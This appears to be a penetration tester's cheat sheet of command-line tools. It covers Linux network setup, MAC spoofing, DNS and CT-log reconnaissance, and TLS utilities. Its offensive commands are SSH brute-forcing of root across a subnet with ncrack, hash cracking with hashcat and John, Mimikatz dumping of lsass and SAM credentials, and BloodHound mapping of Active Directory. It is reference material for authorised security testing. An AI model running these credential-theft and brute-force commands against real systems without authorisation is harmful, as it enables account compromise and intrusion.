Basic #Linux Networking Tools
Show IP configuration:
# ip a lw
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42
Information Gathering
Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs: Search for
%.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com
–script hostmap-crtsh
TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048
-keyout key.pem -out cert.pem -nodes
-subj “/CN=example.org/”
Start TLS Server:
# ncat –ssl -l -p 1337 –ssl-cert
cert.pem –ssl-key key.pem
Connect to TLS service:
# ncat –ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect
10.5.23.42:1337
Cracking
Try SSH passwords from a wordlist:
# ncrack -p 22 –user root -P
./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[…]bd88
Show example hash types for hashcat:
# hashcat –example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt
/path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt
Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv
/sam:sam.hiv
Active Directory
Use SharpHound to gather information and import
into Bloodhound to analyze
Download PingCastle from pingcastle.com and
generate Report